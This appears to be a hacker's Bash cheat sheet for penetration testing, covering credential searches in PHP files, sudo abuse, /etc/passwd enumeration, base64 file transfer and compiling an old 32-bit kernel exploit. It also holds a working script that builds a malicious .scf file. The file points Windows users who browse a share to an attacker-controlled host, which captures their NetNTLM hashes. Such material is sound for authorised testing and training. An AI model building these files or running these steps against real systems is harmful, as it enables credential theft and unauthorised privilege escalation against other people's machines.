d4Rk's 1337 h4x0r guide

Bash


Last updated 3 years ago

find

Search PHP files (at most five directories deep) for the string "password". Quote the glob, otherwise the shell expands it in the current directory before find ever sees it

find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null

Files writable by the current user

find / -writable 2>/dev/null
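The two find commands above as reusable functions, added here as an example (not part of the original page): the glob stays quoted, pseudo-filesystems are pruned so a scan from `/` does not hang on `/proc`, the keyword list is widened to the usual credential names, and "writable" is narrowed to world-writable regular files, which is what matters for privilege escalation. The directory argument and the keyword patterns are assumptions chosen for illustration; the test builds a small constructed tree to run against.

```shell
# Added example, not from the original page.
# Print "file:line:text" for lines mentioning credential-like keywords in
# web/config files below $1. The keyword list is an assumption for illustration.
find_creds() {
    dir=$1
    find "$dir" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
        -type f \( -name '*.php' -o -name '*.conf' -o -name '*.env' \) \
        -exec grep -HniE 'passw(or)?d|secret|api[_-]?key' {} + 2>/dev/null
}

# Print regular files below $1 that anyone can write to (other-write bit set).
find_world_writable() {
    dir=$1
    find "$dir" \( -path /proc -o -path /sys -o -path /dev \) -prune -o \
        -type f -perm -002 -print 2>/dev/null
}
```

Run as `find_creds /var/www` or `find_world_writable /` on the target; both functions are silent about permission errors, as the one-liners above are.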

sudo

List the commands the current user may run through sudo, and as which users

sudo -l

-> Run a command as a user other than the default target user (usually root)

sudo -u <user> <command>

-> Useful in scenarios like this, where <user1> may run anything as <user2> without a password:

User <user1> may run the following commands on bashed:
    (<user2> : <user2>) NOPASSWD: ALL

Start a new login session as <user>. su asks for the password of the target user, not of the current one (root is the exception and is not prompted)

su - <user>
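A small triage helper, added as an example that is not part of the original page: it reads `sudo -l` output and prints every command that needs no password together with the user it runs as, splitting comma-separated lists so each binary can be looked up on GTFOBins individually. The `sudo -l` output below is constructed; the host name "bashed", the users and the commands are illustrative.

```shell
# Added example, not from the original page.
# Constructed sample of `sudo -l` output (host, users and commands are made up).
SAMPLE_SUDO_L='Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
    (root) NOPASSWD: /usr/bin/vim, /bin/cat /var/log/*
    (root) /usr/bin/less'

# Read `sudo -l` output on stdin; print "runas|command" for every command
# that needs no password, one per line (comma-separated lists are split).
sudo_nopasswd() {
    awk '
        /NOPASSWD:/ {
            match($0, /\([^)]*\)/)                 # "(user : group)" or "(root)"
            runas = substr($0, RSTART + 1, RLENGTH - 2)
            sub(/.*NOPASSWD:[ \t]*/, "")            # keep only the command list
            n = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) print runas "|" cmds[i]
        }'
}

# Parse the constructed sample; on a real box use:  sudo -l | sudo_nopasswd
sudo_nopasswd_sample() {
    printf '%s\n' "$SAMPLE_SUDO_L" | sudo_nopasswd
}
```

For the sample this yields `scriptmanager : scriptmanager|ALL`, `root|/usr/bin/vim` and `root|/bin/cat /var/log/*`; the `/usr/bin/less` entry is skipped because it still needs the password.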

file

Get information about file

file <file>

wc

Count bytes (use -m for characters in multi-byte locales)

wc -c

Count lines

wc -l

rlwrap

A 'readline wrapper': a small utility that uses the GNU readline library to add line editing and command history to any command that reads from the terminal, e.g. a netcat listener holding a reverse shell.

rlwrap <cmd>

Permissions

Show or set the mask that is subtracted from the default mode of newly created files (666) and directories (777); it is the inverse of a chmod mode, so with umask 022 new files get 644

umask

authbind

Bind sockets to privileged ports (<1024) without being root; the port must first be allowed by creating an executable file named after it under /etc/authbind/byport/

authbind <command>

base64

Linux

File

Encode (-w 0 disables line wrapping so the output is a single line)

base64 -w 0 <file> > <base64file>

Decode

base64 -d <base64file> > <file>

String

Encode (-n keeps the trailing newline out of the encoded data)

echo -n <string> | base64

Decode

echo <base64string> | base64 -d

Windows

File

Encode (certutil adds BEGIN/END CERTIFICATE header lines; findstr /v drops every line containing "-", which is never part of base64)

certutil -encode <file> tmp.b64 && findstr /v /c:- tmp.b64 > <base64file>

Decode

certutil -decode <base64file> <file>

grep

Ignore case (-i), print 5 lines before (-B5) and after (-A5) each match

grep -i -A5 -B5 <string> <filename>
<cmd> | grep -A5 -B5 "text"

Recursive

grep -R "text" .

Extract open ports from nmap grepable output (-o prints only the matching part, -P enables Perl regex)

grep -oP '\d{1,5}/open' nmap_results.gnmap > ports
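The gnmap extraction taken one step further, as an added example that is not part of the original page: grep pulls the `port/open` fragments, cut keeps the number, sort -un deduplicates across hosts, and paste turns the result into the comma list `nmap -p` accepts. The .gnmap content below is constructed (the IPs, ports and services are made up); real nmap output separates fields with tabs, which the parsing does not depend on.

```shell
# Added example, not from the original page.
# Constructed nmap -oG output; hosts, ports and services are made up.
SAMPLE_GNMAP='# Nmap 7.80 scan initiated as: nmap -oG nmap_results.gnmap 10.10.10.0/29
Host: 10.10.10.68 () Status: Up
Host: 10.10.10.68 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https/// Ignored State: filtered (997)
Host: 10.10.10.70 () Status: Up
Host: 10.10.10.70 () Ports: 80/open/tcp//http///, 445/open/tcp//microsoft-ds/// Ignored State: closed (998)
# Nmap done at ...'

# Print the distinct open ports in the gnmap file $1 as "22,80,445",
# sorted numerically, ready for:  nmap -p "$(gnmap_open_ports scan.gnmap)" -sV <target>
gnmap_open_ports() {
    grep -oE '[0-9]{1,5}/open' "$1" | cut -d/ -f1 | sort -un | paste -sd, -
}

# Print the IPs whose status line says Up, one per line.
gnmap_hosts_up() {
    grep 'Status: Up' "$1" | cut -d' ' -f2
}
```

Note that `sort -un` is required rather than plain `sort -u`: lexical sorting would place 445 before 80, which is harmless for nmap but confusing to read.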

watch

Run command every second

watch -n 1 '<command>'

sed

Remove every space character (not only leading and trailing ones)

sed 's/ //g'

Remove newlines (-z treats the whole input as one NUL-separated record; GNU sed only)

sed -z 's/\n//g' <file>

cut

Split a string by delimiter and extract field 2

echo "some,strings" | cut -d "," -f 2   # outputs "strings"

Extract the first colon-separated field of each line, here the usernames from /etc/passwd

cut -d ":" -f 1 /etc/passwd

cron

List the current user's crontab (system-wide jobs live in /etc/crontab and /etc/cron.d)

crontab -l

sort unique

Sort lines and drop duplicates

sort -u

File size

Disk usage of a file or directory tree, summarized (-s) and human readable (-h)

du -hs <file>

ascii table

man ascii

ltrace / strace

Trace the dynamic library calls a program makes (useful for spotting strcmp/strcpy on user input)

ltrace ./<program>

Trace the system calls a program makes (file opens, execve, network calls)

strace ./<program>

gcc

Use -m32 or -m64 to make the target architecture explicit (a 32-bit exploit built on a 64-bit host needs -m32 and the 32-bit libc development files installed)

gcc <file>.c -o <file>

Compile for an old 32-bit kernel (2.6.9). The old glibc on such systems only understands the SysV symbol hash table, while modern toolchains default to the GNU-style one, so the linker is told to emit both

gcc -o 1397 1397.c -m32 -Wl,--hash-style=both

Specific files

.tar.gz

-c		create
-x		extract
-f		file (takes the archive name as its argument, so it must be the last flag in the group)
-v		verbose
-z		gzip

Create archive

tar -zcvf <archive.tar.gz> <files or directory>

Extract archive

tar -zxvf <archive.tar.gz>

.7z

Extract (x keeps the directory structure, unlike e)

7z x <archive.7z>

List contents

7z l <archive.7z>

.vhd

Mount a VHD image read-only with libguestfs (guestmount comes with libguestfs-tools; the mount point must exist)

guestmount --add <vhd-file> --inspector --ro -v /mnt/vhd

Images with hidden content

binwalk

Tool for searching binary images for embedded files and executable code; -e extracts what it finds, -M recurses into the extracted files

binwalk -Me <image-file>

.scf

Place an .scf (Shell Command File) whose icon path points at a host you control into a writable Windows share. When a user browses the share, Explorer fetches the icon over SMB and authenticates, so a listener on that host captures the user's NetNTLM hash (see the 1337red link below).
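The .scf file itself, as an added example that is not part of the original page: it only holds an icon path in UNC form, so generating it is a few lines of printf. The listener address (10.10.14.5) and share name are assumptions for illustration; on a real engagement the host is the machine where the hash-capturing listener runs.

```shell
# Added example, not from the original page.
# Write an .scf file whose icon lives on \\$1\share, so Explorer authenticates
# to $1 when the containing folder is viewed. $1 (listener host) and the share
# name are assumptions for illustration.
make_scf() {
    host=$1   # IP or name of the machine running the SMB capture listener
    out=$2    # output path; a leading "@" in the name (e.g. @readme.scf) sorts it first in the listing
    # Windows expects CRLF line endings; the IconFile value is \\host\share\file.
    printf '%s\r\n' \
        '[Shell]' \
        'Command=2' \
        "IconFile=\\\\${host}\\share\\icon.ico" \
        '[Taskbar]' \
        'Command=ToggleDesktop' > "$out"
}
```

Usage: `make_scf 10.10.14.5 @readme.scf`, then copy the file to the share and wait for the listener. The share must be one users actually open in Explorer; a share nobody browses yields nothing.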

Related

  • Process monitoring
  • GTFOBins
  • Base64 Encode or Decode on the command line without installing extra tools on Linux, Windows or macOS | Igor Kromin
  • https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/